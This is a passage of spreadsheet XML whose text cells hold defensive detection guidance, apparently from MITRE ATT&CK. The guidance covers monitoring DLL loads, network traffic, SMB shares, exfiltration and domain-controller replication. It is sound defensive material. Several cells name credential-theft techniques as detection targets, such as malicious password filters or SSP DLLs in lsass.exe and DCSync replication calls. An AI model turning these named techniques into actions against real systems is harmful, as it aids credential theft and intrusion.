    <t>Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)</t>
  </si>
  <si>
    <t>Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.</t>
  </si>
  <si>
    <t>Monitor DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma MMC20 COM Jan 2017)</t>
  </si>
  <si>
    <t>Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed.</t>
  </si>
  <si>
    <t>Monitor for DLL/PE file events, such as the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll.</t>
  </si>
  <si>
    <t>Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths.</t>
  </si>
  <si>
    <t>Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017)</t>
  </si>
  <si>
    <t>Monitor for dynamic libraries being loaded. Run path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking</t>
  </si>
  <si>
    <t>Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated API function calls. Dynamic malware analysis may also expose signs of function obfuscation, such as memory reads that correspond to addresses of API function code within modules.(Citation: BlackHat API Packers)</t>
  </si>
  <si>
    <t>Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).</t>
  </si>
  <si>
    <t>Monitor library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor the hybrid identity solution in use for the loading of unauthorized DLLs. For example, monitor all PTA agent servers for the creation of DLLs as well as the loading of DLLs into the `AzureADConnectAuthenticationAgentService` process.(Citation: Mandiant Azure AD Backdoors) If AD FS is in use, monitor the AD FS server for the creation of DLLs as well as the loading of unrecognized or unsigned DLLs into the `Microsoft.IdentityServer.Servicehost` application.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Monitor for the loading of modules associated with scripting languages (ex: JScript.dll).</t>
  </si>
  <si>
    <t>Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) If AD FS is in use, monitor the AD FS server for the creation of DLLs as well as the loading of unrecognized or unsigned DLLs into the `Microsoft.IdentityServer.Servicehost` application.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity.</t>
  </si>
  <si>
    <t>Monitoring module loads, especially those not explicitly included in import tables, may highlight obfuscated code functionality. Dynamic malware analysis may also expose signs of code obfuscation.(Citation: BlackHat API Packers)</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)</t>
  </si>
  <si>
    <t>Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.  New print processor DLLs are written to the print processor directory.</t>
  </si>
  <si>
    <t>Monitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe)</t>
  </si>
  <si>
    <t>Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes, that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.</t>
  </si>
  <si>
    <t>Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t xml:space="preserve"> Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths.</t>
  </si>
  <si>
    <t>Monitor module loads by the Terminal Services process (ex: &lt;code&gt;svchost.exe -k termsvcs&lt;/code&gt;) for unexpected DLLs (the default is &lt;code&gt;%SystemRoot%\System32\termsrv.dll&lt;/code&gt;, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) to potentially conceal a malicious payload).</t>
  </si>
  <si>
    <t>There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>Monitor library load events, especially unusual creation of these binary files followed by loading into processes. Look for libraries that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>Monitor for the loading of modules associated with VB languages (ex: vbscript.dll).</t>
  </si>
  <si>
    <t>New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor for contextual data about named pipes on the system.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections associated with processes performing collection activity, especially those involving abnormal/untrusted hosts. </t>
  </si>
  <si>
    <t>Monitor for newly constructed network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that are sent or received by untrusted hosts. </t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts.</t>
  </si>
  <si>
    <t>Monitor for established network communications with anomalous IPs that have never been seen before in the environment that may indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts, such as Sysmon Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows (e.g. unusual network communications or suspicious communications sending fixed size data packets at regular intervals as well as unusually long connection patterns). Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access configuration content)</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may search network shares on computers they have compromised to find files of interest</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines using Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data. </t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may attempt to exfiltrate data over Bluetooth rather than the command and control channel. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may attempt to exfiltrate data over a different network medium than the command and control channel. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections to web and cloud services associated with abnormal or non-browser processes.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections to cloud services associated with abnormal or non-browser processes.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use Valid Accounts to access and/or persist within a network using External Remote Services. Use of External Remote Services may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using External Remote Services.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. Processes utilizing the network that do not normally have network communication or have never been seen before may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access network configuration content)</t>
  </si>
  <si>
    <t>Monitor for newly constructed network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections (typically over port 3389) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC. Monitor network connections involving common remote management protocols, such as ports tcp:3283 and tcp:5900, as well as ports tcp: 3389 and tcp:22 for remote login.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections (typically over ports 139 or 445), especially those that are sent or received by abnormal or untrusted hosts. Correlate these network connections with remote login events and associated SMB-related activity such as file transfers and remote process execution.</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows. Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows(e.g. snmp traffic originating from unauthorized or untrusted hosts, signature detection for strings mapped to device configuration(s), and anomolies in snmp request(s))</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections (typically port 22) that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH.</t>
  </si>
  <si>
    <t>Monitor recently started applications creating raw socket connections.(Citation: crowdstrike bpf socket filters)</t>
  </si>
  <si>
    <t>Monitor for newly constructed network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification) The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that are sent or received by abnormal or untrusted hosts. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC. </t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect.</t>
  </si>
  <si>
    <t xml:space="preserve">
Monitor for newly constructed network connections using Windows Remote Management (WinRM), such as remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).</t>
  </si>
  <si>
    <t>Monitor for unexpected network shares being accessed on target systems or on large numbers of systems.</t>
  </si>
  <si>
    <t>Monitor for unexpected and abnormal accesses to network shares.</t>
  </si>
  <si>
    <t>Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as SMB.</t>
  </si>
  <si>
    <t>Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB).</t>
  </si>
  <si>
    <t>Monitor interactions with network shares, such as reads or file transfers, using Server Message Block (SMB).</t>
  </si>
  <si>
    <t>Monitor for unexpected and abnormal accesses to network shares, especially those also associated with file activity.</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known AiTM behavior.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous outbound traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.</t>
  </si>
  <si>
    <t>Monitor for network traffic associated with requests and/or downloads of container images, especially those that may be anomalous or known malicious.</t>
  </si>
  <si>
    <t>Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor network traffic for rogue DHCPv6 activity.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for DNS over TLS (DoT) and DNS over HTTPS (DoH), that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor for network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for networks that solicits and obtains the configuration information of the queried device. </t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access configuration content)</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access internal and external websites and services). Consider correlating with application monitoring for indication of unplanned service interruptions or unauthorized content changes.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to LDAP and MSRPC that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure).</t>
  </si>
  <si>
    <t>Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use  network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads.</t>
  </si>
  <si>
    <t>Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.</t>
  </si>
  <si>
    <t>For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs.</t>
  </si>
  <si>
    <t>Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.</t>
  </si>
  <si>
    <t>Monitor for unusual processes with internal network connections creating files on-system may be suspicious</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access network configuration content)</t>
  </si>
  <si>
    <t>Monitoring for SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity.</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</t>
  </si>
  <si>
    <t>Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor)(Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords).</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flow (e.g. snmp traffic originating from unauthorized or untrusted hosts, signature detection for strings mapped to device configuration(s), and anomolies in snmp request(s))</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites,  &lt;code&gt; Mirrored from (victim URL)&lt;/code&gt; may be visible in the HTML section of packets. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). </t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure).</t>
  </si>
  <si>
    <t>Monitor and analyze network packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider packet inspection for Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous internal traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure) from a trusted entity. Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).</t>
  </si>
  <si>
